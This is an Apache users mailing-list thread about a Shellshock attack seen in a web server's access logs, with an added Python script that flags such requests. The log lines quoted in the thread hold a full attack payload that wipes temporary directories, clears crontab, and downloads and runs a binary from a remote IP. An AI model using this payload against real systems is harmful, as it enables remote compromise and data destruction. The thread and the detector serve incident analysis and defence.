"sc.gif" was executed.

On 03.07.2015 09:05, Bremser, Kurt (AMOS Austria GmbH) wrote:
I guess that the 200 comes from the fact that apache simply delivered the /index.html page.
Or did you find that "sc.gif" was transferred and executed?
Kurt Bremser
AMOS Austria
Newton was wrong. There is no gravity. The Earth sucks.
------------------------------------------------------------------------
*From:* Victor Sterpu [vic...@casnt.ro]
*Sent:* Thursday, 2 July 2015 14:29
*To:* users@httpd.apache.org
*Subject:* **SPAM?** Re: [users@httpd] Security question [wd-vc]

In the end the attack was successful. The log shows the last command:
62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif print start pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"

But I don't know how he launched this script.
How can I prevent this?
I was hoping the server would execute only local scripts; is there something I can do to allow only local scripts to be executed?


On 02.07.2015 15:13, Yehuda Katz wrote:

It is an attempt to exploit a specific configuration. By the fact that apache returned a 404 (the log line says so), you can see that the attempt was not successful.

- Y

Sent from a gizmo with a very small keyboard and hyperactive autocorrect.

On Jul 2, 2015 8:00 AM, "Victor Sterpu" <vic...@casnt.ro <mailto:vic...@casnt.ro>> wrote:

    Hello

    A hacker attacked an apache2 web server by HTTP injection.
    The log shows what he has done:
    62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET
    /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() {
    :;};/usr/bin/perl -e 'print \"Content-Type:
    text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/
    ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf
    /var/tmp/.* ; crontab -r ; killall -9 wget fetch curl
    lwp-download b f r xx y i.gif print start pscan pnscan ps ; wget
    http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ;
    chmod +x sc.gif ; nohup ./sc.gif & \");'"

    How can I prevent this in the future and how can I reproduce?
    I tried to reproduce but it is not clear how he launched this
    command and I want to know so I can test my vulnerabilities in
    the future.
    The path "/phppath/cgi_wrapper" doesn't exist at all.

    Thank you




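A small log check reflecting the point made in this thread, added here as an example and not code from any of the posters: it parses Apache combined-format lines, flags a User-Agent carrying the bash function-definition prefix `() {` (the Shellshock pattern used in both requests above), and reports the status so that a 404 probe is told apart from a 200, which on its own only shows Apache served the resource. The sample input is the thread's two requests with the shell payload abbreviated, plus one constructed benign request; the function and variable names are my own.

```python
import re

# Apache "combined" log format; quotes inside a logged field are escaped as \"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)

# A bash function definition "() {" at the start of a header value is the
# injection signature seen in this thread's User-Agent strings.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# Constructed sample input: the thread's two requests (payload abbreviated)
# and one ordinary request that must not be flagged.
SAMPLE_LOG = r"""
62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl -e 'print \"XSUCCESS!\";system(\"...\");'"
62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 "-" "() { :;};/usr/bin/perl -e 'print \"XSUCCESS!\";system(\"...\");'"
10.0.0.5 - - [01/Jul/2015:17:03:10 +0300] "GET /index.html HTTP/1.1" 200 885 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

def parse_line(line):
    """Split one combined-format line into named fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(entry):
    """Return (flagged, reason) for one parsed entry.

    The status code only says whether the requested resource existed: a 404
    means no handler was there to receive the header, while a 200 means the
    resource was served and says nothing about whether a CGI ran the payload.
    """
    if not SHELLSHOCK_RE.search(entry['agent']):
        return False, 'no function-definition prefix in User-Agent'
    parts = entry['request'].split(' ')
    path = parts[1] if len(parts) > 1 else entry['request']
    status = entry['status']
    if status == '404':
        return True, f'probe for {path}: no handler at that path, nothing was invoked'
    if status == '200':
        return True, f'probe for {path}: resource served; 200 alone does not prove the payload ran'
    return True, f'probe for {path}: status {status}'

def scan(log_text):
    """Return (ip, status, reason) for every flagged line in a block of log text."""
    hits = []
    for line in log_text.strip().splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        flagged, reason = classify(entry)
        if flagged:
            hits.append((entry['ip'], entry['status'], reason))
    return hits

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

Whether the 200 request actually ran anything is answered by what handled `/` (a static index.html versus a CGI) and by local evidence such as the files and cron state the payload touches, not by the access log alone.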
